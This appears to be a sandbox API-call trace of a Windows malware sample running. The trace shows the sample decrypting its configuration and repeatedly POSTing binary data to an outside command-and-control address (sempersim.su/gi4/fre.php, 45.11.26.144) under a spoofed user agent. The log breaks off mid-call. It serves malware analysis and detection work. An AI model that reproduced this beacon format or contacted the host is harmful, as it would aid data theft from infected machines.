[0190.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0190.225] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0190.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0190.226] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0190.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0190.227] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0190.227] GetProcessHeap () returned 0x5b0000 [0190.227] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0190.227] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0190.228] GetProcessHeap () returned 0x5b0000 [0190.228] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0190.228] GetProcessHeap () returned 0x5b0000 [0190.228] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0190.228] GetProcessHeap () returned 0x5b0000 [0190.229] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3590 | out: hHeap=0x5b0000) returned 1 [0190.229] GetProcessHeap () returned 0x5b0000 [0190.229] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d32c0 [0190.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.230] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0190.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.239] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0190.246] GetProcessHeap () returned 0x5b0000 [0190.246] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c86b0 [0190.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.248] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c86b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0190.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.249] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0190.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.253] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.253] GetProcessHeap () returned 0x5b0000 [0190.253] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c86b0 | out: hHeap=0x5b0000) returned 1 [0190.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.255] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d32c0, pdwDataLen=0xdfcfc | out: pbData=0x5d32c0, pdwDataLen=0xdfcfc) returned 1 [0190.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.256] CryptDestroyKey (hKey=0x5bde08) returned 1 [0190.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0190.257] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0190.257] GetProcessHeap () returned 0x5b0000 [0190.257] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0190.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0190.258] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0190.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0190.259] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0190.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0190.260] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0190.260] GetProcessHeap () returned 0x5b0000 [0190.260] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0190.260] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdfe8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0190.265] GetProcessHeap () returned 0x5b0000 [0190.265] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa60 [0190.265] socket (af=2, type=1, protocol=6) returned 0x2ec [0190.265] connect (s=0x2ec, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0190.335] FreeAddrInfoW (pAddrInfo=0x5cdfe8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0190.335] GetProcessHeap () returned 0x5b0000 [0190.335] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0190.335] GetProcessHeap () returned 0x5b0000 [0190.335] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0190.336] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0190.337] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0190.337] GetProcessHeap () returned 0x5b0000 [0190.337] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0190.337] GetProcessHeap () returned 0x5b0000 [0190.338] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0190.338] GetProcessHeap () returned 0x5b0000 [0190.338] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2f60 [0190.338] GetProcessHeap () returned 0x5b0000 [0190.338] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0190.339] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0190.339] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0190.339] GetProcessHeap () returned 0x5b0000 [0190.340] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0190.340] GetProcessHeap () returned 0x5b0000 [0190.340] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0190.340] send (s=0x2ec, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0190.343] send (s=0x2ec, buf=0x5d1e18*, len=159, flags=0) returned 159 [0190.343] GetProcessHeap () returned 0x5b0000 [0190.343] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0190.343] recv (in: s=0x2ec, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0191.823] GetProcessHeap () returned 0x5b0000 [0191.823] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0191.823] GetProcessHeap () returned 0x5b0000 [0191.824] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0191.824] GetProcessHeap () returned 0x5b0000 [0191.824] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0191.824] GetProcessHeap () returned 0x5b0000 [0191.825] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0191.825] closesocket (s=0x2ec) returned 0 [0191.826] GetProcessHeap () returned 0x5b0000 [0191.826] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa60 | out: hHeap=0x5b0000) returned 1 [0191.826] GetProcessHeap () returned 0x5b0000 [0191.826] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0191.826] GetProcessHeap () returned 0x5b0000 [0191.826] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0191.826] GetProcessHeap () returned 0x5b0000 [0191.827] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0191.827] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1118) returned 0x2ec [0191.829] Sleep (dwMilliseconds=0xea60) [0191.846] GetProcessHeap () returned 0x5b0000 [0191.846] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3308 [0191.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.847] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0191.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.856] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5e60) returned 1 [0191.869] GetProcessHeap () returned 0x5b0000 [0191.869] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0191.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.870] CryptImportKey (in: hProv=0x5c5e60, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0191.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.872] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0191.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.873] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.873] GetProcessHeap () returned 0x5b0000 [0191.873] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0191.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.874] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3308, pdwDataLen=0xdfcfc | out: pbData=0x5d3308, pdwDataLen=0xdfcfc) returned 1 [0191.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.881] CryptDestroyKey (hKey=0x5be048) returned 1 [0191.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.882] CryptReleaseContext (hProv=0x5c5e60, dwFlags=0x0) returned 1 [0191.882] GetProcessHeap () returned 0x5b0000 [0191.882] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0191.883] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0191.883] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0191.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0191.884] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0191.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0191.885] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0191.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0191.886] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0191.886] GetProcessHeap () returned 0x5b0000 [0191.886] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0191.886] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0191.887] GetProcessHeap () returned 0x5b0000 [0191.888] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0191.888] GetProcessHeap () returned 0x5b0000 [0191.888] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0191.888] GetProcessHeap () returned 0x5b0000 [0191.888] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3308 | out: hHeap=0x5b0000) returned 1 [0191.888] GetProcessHeap () returned 0x5b0000 [0191.888] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e88 [0191.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.889] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0191.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.902] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0191.914] GetProcessHeap () returned 0x5b0000 [0191.914] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0191.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.915] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0191.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.916] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0191.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.969] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.969] GetProcessHeap () returned 0x5b0000 [0191.969] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0191.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.970] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e88, pdwDataLen=0xdfcfc | out: pbData=0x5d2e88, pdwDataLen=0xdfcfc) returned 1 [0191.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.971] CryptDestroyKey (hKey=0x5bde08) returned 1 [0191.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0191.972] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0191.972] GetProcessHeap () returned 0x5b0000 [0191.972] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0191.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0191.973] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0191.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0191.974] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0191.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0191.975] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0191.975] GetProcessHeap () returned 0x5b0000 [0191.975] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0191.975] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdc78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0191.977] GetProcessHeap () returned 0x5b0000 [0191.977] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa80 [0191.977] socket (af=2, type=1, protocol=6) returned 0x2f0 [0191.978] connect (s=0x2f0, name=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0192.046] FreeAddrInfoW (pAddrInfo=0x5cdc78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0192.046] GetProcessHeap () returned 0x5b0000 [0192.047] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0192.047] GetProcessHeap () returned 0x5b0000 [0192.047] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0192.047] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0192.048] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0192.048] GetProcessHeap () returned 0x5b0000 [0192.048] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0192.048] GetProcessHeap () returned 0x5b0000 [0192.049] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0192.049] GetProcessHeap () returned 0x5b0000 [0192.049] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2fa8 [0192.049] GetProcessHeap () returned 0x5b0000 [0192.049] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0192.050] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0192.050] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0192.050] GetProcessHeap () returned 0x5b0000 [0192.050] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0192.051] GetProcessHeap () returned 0x5b0000 [0192.051] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0192.051] send (s=0x2f0, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0192.052] send (s=0x2f0, buf=0x5d1e18*, len=159, flags=0) returned 159 [0192.052] GetProcessHeap () returned 0x5b0000 [0192.052] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0192.052] recv (in: s=0x2f0, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0193.141] GetProcessHeap () returned 0x5b0000 [0193.142] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0193.142] GetProcessHeap () returned 0x5b0000 [0193.142] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2fa8 | out: hHeap=0x5b0000) returned 1 [0193.142] GetProcessHeap () returned 0x5b0000 [0193.142] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0193.142] GetProcessHeap () returned 0x5b0000 [0193.143] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0193.143] closesocket (s=0x2f0) returned 0 [0193.144] GetProcessHeap () returned 0x5b0000 [0193.144] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa80 | out: hHeap=0x5b0000) returned 1 [0193.144] GetProcessHeap () returned 0x5b0000 [0193.144] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0193.144] GetProcessHeap () returned 0x5b0000 [0193.144] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e88 | out: hHeap=0x5b0000) returned 1 [0193.145] GetProcessHeap () returned 0x5b0000 [0193.145] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0193.145] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x120c) returned 0x2f0 [0193.147] Sleep (dwMilliseconds=0xea60) [0193.156] GetProcessHeap () returned 0x5b0000 [0193.156] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d34b8 [0193.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.157] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0193.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.164] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0193.171] GetProcessHeap () returned 0x5b0000 [0193.171] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0193.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.174] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0193.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.176] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0193.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.176] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.177] GetProcessHeap () returned 0x5b0000 [0193.177] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0193.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.178] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d34b8, pdwDataLen=0xdfcfc | out: pbData=0x5d34b8, pdwDataLen=0xdfcfc) returned 1 [0193.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.179] CryptDestroyKey (hKey=0x5be288) returned 1 [0193.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0193.179] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0193.179] GetProcessHeap () returned 0x5b0000 [0193.179] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0193.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0193.180] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0193.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0193.181] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0193.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0193.182] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0193.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0193.183] StrStrA 